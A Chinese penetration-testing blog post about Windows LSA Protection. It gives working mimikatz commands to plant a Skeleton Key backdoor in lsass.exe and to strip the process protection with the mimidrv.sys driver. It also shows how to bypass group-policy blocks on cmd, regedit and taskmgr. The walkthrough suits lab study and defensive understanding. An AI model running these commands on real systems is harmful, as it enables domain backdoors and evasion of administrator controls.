• 域渗透-LSA PROTECTION


    简介:
    微软在 2014 年 3 月 12 日添加了 LSA 保护策略,用来防止对进程 lsass.exe 的代码注入,这样一来就无法使用 mimikatz 对 lsass.exe 进行注入,相关操作也会失败。
     
    适用系统:
    Windows 8.1
    Windows Server 2012 R2
     
    接下来换用 Windows Server 2012 R2 进行测试
    (1)配置 LSA Protection
    注册表位置:
    HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa
    新建-DWORD(32)值,名称为 RunAsPPL,数值为 00000001,重启系统生效。
     
    (2)测试 Skeleton Key
    mimikatz 命令:
    privilege::debug
    misc::skeleton
    未配置LSA Protection时不会报错。
    配置LSA Protection时失败报错:
     
    (3)绕过 LSA Protection
    mimikatz 早在 2013 年 10 月就已支持绕过 LSA Protection
     
    注:该功能需要 mimidrv.sys 文件
     
    mimikatz 命令:
    privilege::debug
    !+
    !processprotect /process:lsass.exe /remove
    misc::skeleton
    如图,导入驱动文件mimidrv.sys后,绕过 LSA Protection,操作成功
    关闭LSA Protection,将RunAsPPL的值改为0重启计算机即可。
     
    补充:
    一些常见问题的解决方法,管理员常常会禁用一些重要程序的运行,比如 cmd、regedit、taskmgr等
    1、如何禁用 cmd、regedit、taskmgr
    输入 gpedit.msc 进入本地组策略编辑器
    本地计算机策略-用户配置-管理模板-系统
     
    禁用 cmd:
    选择”阻止访问命令提示符”-编辑—启用
    阻止命令提示符启用。
    测试:命令提示符已被管理员停用。
     
    禁用 regedit:
    选择阻止访问注册表编辑工具”-编辑-启用
    禁用 Windows 注册表编辑器 Regedit.exe。
    测试:注册表编辑器已被管理员禁用。
     
    禁用 taskmgr:
    选择”不要运行指定的 Windows 应用程序”-不允许的应用程序列表-填入 taskmgr.exe-启用。
    防止 Windows 运行在此设置中指定的程序。
    测试:用户无法运行已添加到不允许的应用程序列表的程序。
    经测试 cmd、regedit、taskmgr 均已被禁用。
     
    2、绕过
    mimikatz 命令:
    privilege::debug
    misc::cmd
    misc::regedit
    misc::taskmgr
     
     
    成功执行,绕过限制。
     
    做自己想做的,不要活给别人看。
  • 相关阅读:
    Ado.Net基础拾遗一:读取数据
    Linq 简明教程
    ASP.NET MVC DropdownList的使用
    inner join, left join ,right join 结果
    C#基础之 派生类
    SQL Server 笔试题总结
    SQL Server 基础 之 CASE 子句
    昨晚京东校招笔试,没考一道.net,全考java了
    利用scrapy和MongoDB来开发一个爬虫
    linux 获取网卡的IP地址
  • 原文地址:https://www.cnblogs.com/micr067/p/12407509.html
Copyright © 2020-2023  润新知